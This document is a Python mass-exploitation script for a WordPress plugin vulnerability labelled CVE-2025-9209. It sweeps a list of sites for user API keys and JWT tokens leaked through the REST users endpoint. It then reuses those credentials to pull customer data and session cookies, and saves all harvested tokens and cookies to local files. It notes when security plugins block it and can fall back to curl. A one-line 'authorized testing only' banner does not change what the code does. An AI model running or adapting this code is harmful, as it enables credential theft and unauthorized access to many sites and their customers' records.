#!/usr/bin/env python3 from __future__ import annotations import requests import urllib3 import json import re import threading import time import shutil import subprocess from concurrent.futures import ThreadPoolExecutor, as_completed from pathlib import Path from typing import Dict, List, Tuple, Optional urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) OUT_FILE = Path("exposures.txt") TOKENS_FILE = Path("tokens.txt") EXPLOITED_FILE = Path("exploited_sites.txt") COOKIES_FILE = Path("cookies.txt") DEFAULT_THREADS = 10 DEFAULT_DELAY = 0.2 REQUEST_TIMEOUT = 14 try: from colorama import Fore, Style, init as color_init color_init(autoreset=True) except Exception: class _C: pass Fore = _C(); Style = _C() Fore.GREEN = Fore.LIGHTYELLOW_EX = Fore.LIGHTBLACK_EX = Fore.YELLOW = Fore.CYAN = Fore.RED = Fore.WHITE = Fore.MAGENTA = "" Style.BRIGHT = Style.NORMAL = "" DEFENDER_INDICATORS = [ "Access denied", "AntiBot Unlock Me", "Access denied by Imunify360", "AntiBot Global Firewall", "altcha", "/wp-admin/admin-ajax.php?action=wp_defender", "imunify", "blocked your ip", "blocked your IP", ] HEADER_VARIANTS = [ {"User-Agent": "curl/7.86.0", "Accept": "*/*", "Connection": "keep-alive"}, {"User-Agent": "curl/7.86.0", "Accept": "application/json, text/plain, */*", "Accept-Encoding": "gzip, deflate, br", "Connection": "keep-alive"}, {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36", "Accept": "application/json, text/plain, */*", "Accept-Language": "en-US,en;q=0.9", "Accept-Encoding": "gzip, deflate, br", "Connection": "keep-alive"}, ] file_lock = threading.Lock() RE_BCRYPT = re.compile(r'^\$2[ayb]\$') RE_JWT = re.compile(r'^eyJ[A-Za-z0-9_\-]+\.[A-Za-z0-9_\-]+\.[A-Za-z0-9_\-\.=]*') RE_HEX = re.compile(r'^[0-9a-fA-F]+$') def print_banner(): banner = r''' @@@ @@@ @@@ @@@ @@@@@@@ @@@ @@@@@@ @@@ @@@@@@@ @@@@@@@@ @@@@@@@ @@@@ @@@ @@@ @@@ @@@@@@@@ @@@ @@@@@@@@ @@@ @@@@@@@ @@@@@@@@ @@@@@@@@ @@!@!@@@ @@! !@@ @@! @@@ @@! @@! @@@ @@! @@! @@! @@! @@@ !@!!@!@! !@! @!! !@! @!@ !@! !@! @!@ !@! !@! !@! !@! @!@ @!@ !!@! !@@!@! @!@@!@! @!! @!@ !@! !!@ @!! @!!!:! @!@ !@! !@! !!! @!!! !!@!!! !!! !@! !!! !!! !!! !!!!!: !@! !!! !!: !!! !: :!! !!: !!: !!: !!! !!: !!: !!: !!: !!! :!: !:! :!: !:! :!: :!: :!: !:! :!: :!: :!: :!: !:! :: :: :: ::: :: :: :::: ::::: :: :: :: :: :::: :::: :: :: : : :: : : :: : : : : : : : : :: :: :: : : ''' print(Fore.GREEN + Style.BRIGHT + banner) print(Fore.GREEN + Style.BRIGHT + "Mass Exploit for CVE-2025-9209 By: Nxploited (Khaled ALenazi)".center(86)) print(Fore.CYAN + Style.BRIGHT + "GitHub: https://github.com/Nxploited | Telegram: @KNxploited (contact via Telegram)".center(86)) print(Fore.YELLOW + Style.BRIGHT + "\nAuthorized testing only. Use this tool only on data/systems you are permitted to test.\n") def is_defender_block(text: str) -> bool: if not text: return False low = text.lower() for token in DEFENDER_INDICATORS: if token.lower() in low: return True return False def run_curl_get(url: str, timeout: int = 15) -> Tuple[str, int]: cmd = ["curl", "-k", "-s", "--max-time", str(int(timeout)), "-L", url] try: p = subprocess.run(cmd, capture_output=True, text=True) return p.stdout or "", p.returncode except Exception: return "", 1 def normalize_site(line: str) -> str: s = line.strip() if not s: return "" if not s.startswith("http://") and not s.startswith("https://"): s = "https://" + s return s.rstrip('/') def inspect_user_meta(user: Dict) -> List[Dict]: found = [] meta = user.get("meta") or {} pk = meta.get("_rp_api_user_private_key") if isinstance(pk, str) and RE_BCRYPT.match(pk): found.append({"user_id": user.get("id") or user.get("ID"), "slug": user.get("slug") or user.get("name"), "meta_key": "_rp_api_user_private_key", "meta_value": pk, "kind": "private_key"}) pub = meta.get("_rp_api_user_public_key") if isinstance(pub, str) and (RE_HEX.match(pub) or len(pub) > 40): found.append({"user_id": user.get("id") or user.get("ID"), "slug": user.get("slug") or user.get("name"), "meta_key": "_rp_api_user_public_key", "meta_value": pub, "kind": "public_key"}) tok = meta.get("_rp_api_user_token_key") if isinstance(tok, str) and RE_JWT.match(tok): found.append({"user_id": user.get("id") or user.get("ID"), "slug": user.get("slug") or user.get("name"), "meta_key": "_rp_api_user_token_key", "meta_value": tok, "kind": "token"}) return found def summarize_value(val: str, keep_full: bool=False) -> str: if keep_full: return val if not val: return "" v = str(val) if len(v) <= 20: return v return v[:10] + "..." + v[-10:] def write_exposure(site: str, user_id: str, meta_key: str, summary: str): with file_lock: try: if not OUT_FILE.exists(): OUT_FILE.write_text("# timestamp | site | user_id | meta_key | summary\n", encoding="utf-8") ts = time.strftime("%Y-%m-%d %H:%M:%S", time.gmtime()) with OUT_FILE.open("a", encoding="utf-8") as fh: fh.write(f"{ts} | {site} | {user_id} | {meta_key} | {summary}\n") except Exception: pass def write_token(site: str, user_id: str, token: str): with file_lock: try: if not TOKENS_FILE.exists(): TOKENS_FILE.write_text("# site | user_id | token\n", encoding="utf-8") with TOKENS_FILE.open("a", encoding="utf-8") as fh: fh.write(f"{site} | {user_id} | {token}\n") except Exception: pass def write_exploited(site: str, count: int): with file_lock: try: if not EXPLOITED_FILE.exists(): EXPLOITED_FILE.write_text("# site | exploited | count\n", encoding="utf-8") with EXPLOITED_FILE.open("a", encoding="utf-8") as fh: fh.write(f"{site} | exploited | {count}\n") except Exception: pass def write_cookies(site, user_id, cookie, cookies_dict): with file_lock: try: if not COOKIES_FILE.exists(): COOKIES_FILE.write_text("# site | user_id | cookie | cookie_dict\n", encoding="utf-8") with COOKIES_FILE.open("a", encoding="utf-8") as fh: fh.write(f"{site} | {user_id} | {cookie} | {cookies_dict}\n") except Exception: pass def try_parse_json_fuzzy(text: str): if not text: return None try: return json.loads(text) except Exception: pass # Attempt fuzzy recovery of JSON from output first = None for i, ch in enumerate(text): if ch in ('{','['): first = i break if first is None: return None last = max(text.rfind('}'), text.rfind(']')) if last <= first: return None try: return json.loads(text[first:last+1]) except Exception: return None def verify_credentials(site: str, user_id: str, token: str, api_key: str) -> Tuple[bool, int, str, str, dict]: url = site.rstrip('/') + "/wp-json/rp/v1/customers" headers = { "Authorization": f"Bearer {token}", "X-API-Key": api_key, "X-User-ID": str(user_id), "Accept": "application/json", "User-Agent": "curl/7.86.0", } try: r = requests.get(url, headers=headers, timeout=REQUEST_TIMEOUT, verify=False, allow_redirects=True) cookie_str = r.headers.get("Set-Cookie", "") cookies_dict = r.cookies.get_dict() body = r.text or "" snippet = (body[:400] + "...") if len(body) > 400 else body return (r.status_code == 200, r.status_code, snippet, cookie_str, cookies_dict) except Exception as e: return False, -1, str(e), "", {} def print_mass_exploit(site: str, count: int): box = "═" * 86 print(Fore.GREEN + Style.BRIGHT + box) print(Fore.GREEN + Style.BRIGHT + f" 💚💚💚 MASS EXPLOIT SUMMARY — {site} ".center(86, "═")) print(Fore.GREEN + Style.BRIGHT + box) print(Fore.GREEN + Style.BRIGHT + f"┃ Accounts found: {Style.BRIGHT}{count}") print(Fore.GREEN + Style.BRIGHT + box) print() def print_success(site: str, user_id, meta_key: str, kind: str): box = "─" * 86 print(Fore.GREEN + Style.BRIGHT + "[ SUCCESS ]".center(86)) print(Fore.GREEN + Style.NORMAL + f"┃ Site: {Style.BRIGHT}{site}") print(Fore.GREEN + Style.NORMAL + f"┃ User ID: {Style.BRIGHT}{user_id}") print(Fore.GREEN + Style.NORMAL + f"┃ Key: {Style.BRIGHT}{meta_key}") print(Fore.GREEN + Style.NORMAL + f"┃ Type: {Style.BRIGHT}{kind}") print(Fore.GREEN + box) print() def print_token_found(site: str, user_id, token: str): box = "═" * 86 print(Fore.LIGHTYELLOW_EX + Style.BRIGHT + box) print(Fore.LIGHTYELLOW_EX + Style.BRIGHT + "➡️ TOKEN FOUND ⬅️".center(86)) print(Fore.LIGHTYELLOW_EX + Style.BRIGHT + box) print(Fore.LIGHTYELLOW_EX + f"┃ Site: {Style.BRIGHT}{site}") print(Fore.LIGHTYELLOW_EX + f"┃ User ID: {Style.BRIGHT}{user_id}") print(Fore.LIGHTYELLOW_EX + f"┃ Token: {Style.BRIGHT}⇒ {token[:18]}...{token[-18:]}") print(Fore.LIGHTYELLOW_EX + box) print() def print_cookie_found(site, user_id, cookie): box = "═" * 86 print(Fore.LIGHTYELLOW_EX + Style.BRIGHT + box) print(Fore.LIGHTYELLOW_EX + Style.BRIGHT + "🍪 COOKIE FOUND 🍪".center(86)) print(Fore.LIGHTYELLOW_EX + Style.BRIGHT + box) print(Fore.LIGHTYELLOW_EX + f"┃ Site: {Style.BRIGHT}{site}") print(Fore.LIGHTYELLOW_EX + f"┃ User ID: {Style.BRIGHT}{user_id}") print(Fore.LIGHTYELLOW_EX + f"┃ Cookie: {Style.BRIGHT}⇒ {cookie}") print(Fore.LIGHTYELLOW_EX + box) print() def print_failed(site, status=None, ctype=None, snippet=""): box = "░" * 86 print(Fore.LIGHTBLACK_EX + Style.BRIGHT + "[ FAILED ]".center(86)) print(Fore.LIGHTBLACK_EX + Style.NORMAL + f"┃ Site: {Style.BRIGHT}{site}") if status is not None: print(Fore.LIGHTBLACK_EX + f"┃ Status: {Style.BRIGHT}{status}") if ctype is not None: print(Fore.LIGHTBLACK_EX + f"┃ Type: {Style.BRIGHT}{ctype}") if snippet: print(Fore.LIGHTBLACK_EX + f"┃ Detail: {Style.NORMAL}{snippet[:80]}...") print(Fore.LIGHTBLACK_EX + Style.BRIGHT + box) print() def print_blocked(site): box = "▒" * 86 print(Fore.YELLOW + Style.BRIGHT + box) print(Fore.YELLOW + Style.BRIGHT + "[ BLOCKED ]".center(86)) print(Fore.YELLOW + Style.BRIGHT + box) print(Fore.YELLOW + Style.BRIGHT + f"┃ Site: {site}") print(Fore.YELLOW + Style.BRIGHT + f"┃ Status: Protected by Defender/Imunify360") print(Fore.YELLOW + Style.BRIGHT + box) print() def scan_site(site: str, verify: bool=False, curl_fallback: bool=False) -> dict: api_users = site.rstrip('/') + "/wp-json/wp/v2/users?per_page=100" last_text = "" status = None ctype = None found_tokens = [] exposures = [] for idx, hdrs in enumerate(HEADER_VARIANTS, start=1): try: s = requests.Session() s.headers.update(hdrs) r = s.get(api_users, timeout=REQUEST_TIMEOUT, verify=False, allow_redirects=True) status = getattr(r, "status_code", None) ctype = r.headers.get("Content-Type", "") if r is not None else "" last_text = r.text or "" except Exception: last_text = "" r = None status = None ctype = None if is_defender_block(last_text): print_blocked(site) return {"site": site, "status": status, "content_type": ctype, "exposures": [], "blocked": True} parsed = try_parse_json_fuzzy(last_text) if isinstance(parsed, list): for user in parsed: found = inspect_user_meta(user) if found: for f in found: exposures.append(f) elif isinstance(parsed, dict): found = inspect_user_meta(parsed) if found: for f in found: exposures.append(f) if exposures: if len(exposures) > 1: print_mass_exploit(site, len(exposures)) write_exploited(site, len(exposures)) for e in exposures: user_id = e.get("user_id") meta_key = e.get("meta_key") val = e.get("meta_value") kind = e.get("kind") summary = summarize_value(val, keep_full=False) if kind == "token": print_token_found(site, user_id, val) write_token(site, str(user_id), val) found_tokens.append((site, user_id, val)) if verify: pub = None for x in exposures: if x.get("kind") == "public_key" and (x.get("user_id") == user_id): pub = x.get("meta_value") break if pub: ok, sc, snippet, cookie_str, cookies_dict = verify_credentials(site, user_id, val, pub) if cookie_str or cookies_dict: print_cookie_found(site, user_id, cookie_str if cookie_str else str(cookies_dict)) write_cookies(site, str(user_id), cookie_str, cookies_dict) print_success(site, user_id, meta_key, kind) write_exposure(site, str(user_id), meta_key, summary) return {"site": site, "status": status, "content_type": ctype, "exposures": exposures, "blocked": False, "tokens": found_tokens} time.sleep(0.12) if curl_fallback: curl_path = shutil.which("curl") if curl_path: curl_out, rc = run_curl_get(api_users, timeout=REQUEST_TIMEOUT) if curl_out: if is_defender_block(curl_out): print_blocked(site) return {"site": site, "status": None, "content_type": None, "exposures": [], "blocked": True} parsed2 = try_parse_json_fuzzy(curl_out) exposures = [] found_tokens = [] if isinstance(parsed2, list): for user in parsed2: found = inspect_user_meta(user) if found: exposures.extend(found) elif isinstance(parsed2, dict): found = inspect_user_meta(parsed2) if found: exposures.extend(found) if exposures: if len(exposures) > 1: print_mass_exploit(site, len(exposures)) write_exploited(site, len(exposures)) for e in exposures: user_id = e.get("user_id") meta_key = e.get("meta_key") val = e.get("meta_value") kind = e.get("kind") summary = summarize_value(val, keep_full=False) if kind == "token": print_token_found(site, user_id, val) write_token(site, str(user_id), val) found_tokens.append((site, user_id, val)) if verify: pub = None for x in exposures: if x.get("kind") == "public_key" and (x.get("user_id") == user_id): pub = x.get("meta_value") break if pub: ok, sc, snippet, cookie_str, cookies_dict = verify_credentials(site, user_id, val, pub) if cookie_str or cookies_dict: print_cookie_found(site, user_id, cookie_str if cookie_str else str(cookies_dict)) write_cookies(site, str(user_id), cookie_str, cookies_dict) print_success(site, user_id, meta_key, kind) write_exposure(site, str(user_id), meta_key, summary) return {"site": site, "status": None, "content_type": None, "exposures": exposures, "blocked": False, "tokens": found_tokens} print_failed(site, status, ctype, last_text) return {"site": site, "status": status, "content_type": ctype, "exposures": [], "blocked": False, "tokens": []} def main(): print_banner() sites_file = input("Enter sites filename (one per line): ").strip() if not sites_file: print(Fore.RED + "No file provided. Exiting.") return p = Path(sites_file) if not p.exists(): print(Fore.RED + f"File not found: {sites_file}") return try: threads = int(input(f"Thread concurrency (default {DEFAULT_THREADS}): ").strip() or DEFAULT_THREADS) except Exception: threads = DEFAULT_THREADS verify_choice = input("Verify discovered token+api_key by calling /wp-json/rp/v1/customers? (y/N): ").strip().lower() verify = (verify_choice == "y") curl_choice = input("Use curl fallback if requests fails? (y/N): ").strip().lower() curl_fallback = (curl_choice == "y") try: polite_delay = float(input(f"Polite delay between requests per-thread (seconds, default {DEFAULT_DELAY}): ").strip() or DEFAULT_DELAY) except Exception: polite_delay = DEFAULT_DELAY sites = [] with open(sites_file, "r", encoding="utf-8") as fh: for line in fh: s = normalize_site(line) if s: sites.append(s) total = len(sites) print(Fore.CYAN + f"\nScanning {total} sites with {threads} threads (verify={verify} curl_fallback={curl_fallback})\n") start = time.time() def worker(site: str): scan_site(site, verify=verify, curl_fallback=curl_fallback) time.sleep(polite_delay) with ThreadPoolExecutor(max_workers=threads) as exe: futures = [exe.submit(worker, s) for s in sites] try: for _ in as_completed(futures): pass except KeyboardInterrupt: print(Fore.RED + "\nInterrupted by user. Shutting down.") exe.shutdown(wait=False) elapsed = time.time() - start print(Fore.GREEN + f"\n[Done] in {elapsed:.1f} seconds.") print(Fore.GREEN + f"\n[exposures.txt] : exposures per account/credential") print(Fore.LIGHTYELLOW_EX + f"[tokens.txt] : All tokens found in scan") print(Fore.LIGHTYELLOW_EX + f"[cookies.txt] : All cookies found in scan") print(Fore.GREEN + f"[exploited_sites.txt] : Mass exploited sites") if __name__ == "__main__": main()